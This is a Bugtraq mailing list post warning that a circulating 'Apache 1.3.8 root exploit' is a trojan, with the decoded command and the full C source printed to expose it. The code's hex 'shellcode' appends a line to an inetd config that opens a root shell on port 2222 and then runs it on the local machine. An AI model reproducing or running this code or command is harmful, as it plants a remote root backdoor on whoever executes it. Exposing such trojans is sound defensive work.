Home page logo
/

bugtraq logo Bugtraq mailing list archives

don't run random "exploit" code
From: marcs () ZNEP COM (Marc Slemko)
Date: Tue, 8 Feb 2000 14:55:48 -0700


-----BEGIN PGP SIGNED MESSAGE-----

Below is some code that I have seen a number of times, with some
very slight variations, over the past few months.  I have no idea
how many people have been tricked by it.  This does not exploit
any hole in Apache, period.  As a simple inspection shows you, it
will run:

echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h

on the local machine.  If you try this "exploit" as root, it will
certainly try to compromise your machine.  But not remotely and it
is nothing to do with Apache or any bug other than the "bug" of
admins running random code as root.

I know this should be too obvious to have to say and should be no news to
anyone here, but: do not run random supposed exploits as root on your box
without knowing what they do.  Do not even run them as a non-root UID
unless it is a throwaway UID (better yet, a throw away box) and you have
examined what the program does.  This obviously applies to things posted
to bugtraq but, even more so, to "secret" exploits you may find or be
sent.

Again: the below code has nothing to do with any supposed security hole
in Apache.

To top it all off, in this case is the fact is that there was never
an Apache 1.3.8 released to exploit.  Apache went from 1.3.6 to
1.3.9.

I am posting this to chop off any rumors of a "secret" Apache root exploit
at the knees as well as to give people an example of why they shouldn't do
silly things.

Thanks.

/* remote apache 1.3.8 root exploit (linux) */

#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] = \
         "\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72"
         "\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74"
         "\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
         "\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f"
         "\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e"
         "\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68";

#define NOP     0x90
#define BSIZE   256
#define OFFSET  400
#define ADDR    0xbffff658
#define ASIZE   2000

int
main(int argc, char *argv[])
{
        char *buffer;
        int s;
        struct hostent *hp;
        struct sockaddr_in sin;
        if (argc != 2) {
                printf("%s <target>\n", argv[0]);
                exit(1);
          }
        buffer = (char *) malloc(BSIZE + ASIZE + 100);
        if (buffer == NULL) {
                printf("Not enough memory\n");
                exit(1);
          }
        memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
                strlen(shellcode));
        buffer[BSIZE + ASIZE] = ';';
        buffer[BSIZE + ASIZE + 1] = '\0';
        hp = gethostbyname(argv[1]);
        if (hp == NULL) {
                printf("no such server\n");
                exit(1);
          }
        bzero(&sin, sizeof(sin));
        bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s < 0) {
                printf("Can't open socket\n");
                exit(1);
          }
        if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
                printf("Connection refused\n");
                exit(1);
          }
        printf("sending exploit code...\n");
        if (send(s, buffer, strlen(buffer), 0) != 1)
                printf("exploit was successful!\n");
          else
                printf("sorry, this site isn't vulnerable\n");
        printf("waiting for shell.....\n");
        if (fork() == 0)
              execl("/bin/sh", "sh", "-c", shellcode, 0);
          else
                wait(NULL);
        while (1) { /* shell */ }
}

- --
     Marc Slemko     | Apache Software Foundation member
     marcs () znep com  | marc () apache org

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBOKCQ51Qv/g4Arev1AQEsqwP/Rs5+WrJtuTavrvpPh2Fwfc5twpYVDTrh
mlLUYzfReB8T0gUDgjr5/SEO/KDcn/i+qwQ8V7y5XWqRLUx4j+QVZNW+HIzQnoH3
6cbqIUT1vH49fMQIO/5tsuYvFlRX+sN/HIILTtVlc32Ok9TOBapiRTfSl29tROjS
SolcNQONdyk=
=6HcL
-----END PGP SIGNATURE-----


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault